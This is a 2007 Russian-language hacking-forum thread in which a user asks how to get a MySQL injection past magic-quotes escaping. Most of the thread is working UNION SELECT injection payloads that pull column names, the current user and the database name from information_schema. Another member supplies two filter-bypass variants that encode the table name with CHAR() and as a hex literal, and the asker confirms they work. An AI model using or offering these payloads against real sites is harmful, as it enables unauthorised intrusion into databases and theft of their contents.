Обход кавычки в mysql-inj?

orcismylife · 20 Nov 2007

Версия
5.0.22-log

Нужно обойти кавычку...

=====
При построении запроса:

+union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name='USER_PRIVILEGES'+limit+1,1/*

=====
Мускул выдает, что:

<...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

Мэджик квотес судя по всему включены... Обойти как-то можно?

ЗЫ. Пробовал перевести в хекс - не получилось.

Constantine · 20 Nov 2007

Что значит не получилось в хекс перевести?

orcismylife · 20 Nov 2007

переверсти в хекс получилось, результат запроса не изменился

+toxa+ · 20 Nov 2007

Надеюсь ты ковычки тоже в хекс не переводил...

Scipio · 20 Nov 2007

вот тебе два варианта:
+union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name=CHAR(85,83,69,82,95,80,82,73,86,73,76,69,71,69,83)+limit+1,1/*

+union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name=0x555345525F50524956494C45474553+limit+1,1/*

orcismylife · 20 Nov 2007

йа дибилко. забыл про char().. всем огромное спасибо.

Обход кавычки в mysql-inj?

orcismylife Elder - Старейшина

Constantine Elder - Старейшина

orcismylife Elder - Старейшина

+toxa+ Smack! SMACK!!!

Scipio Well-Known Member

orcismylife Elder - Старейшина

Useful Searches

Обход кавычки в mysql-inj?

orcismylife Elder - Старейшина

Constantine Elder - Старейшина

orcismylife Elder - Старейшина

+toxa+ Smack! SMACK!!!

Scipio Well-Known Member

orcismylife Elder - Старейшина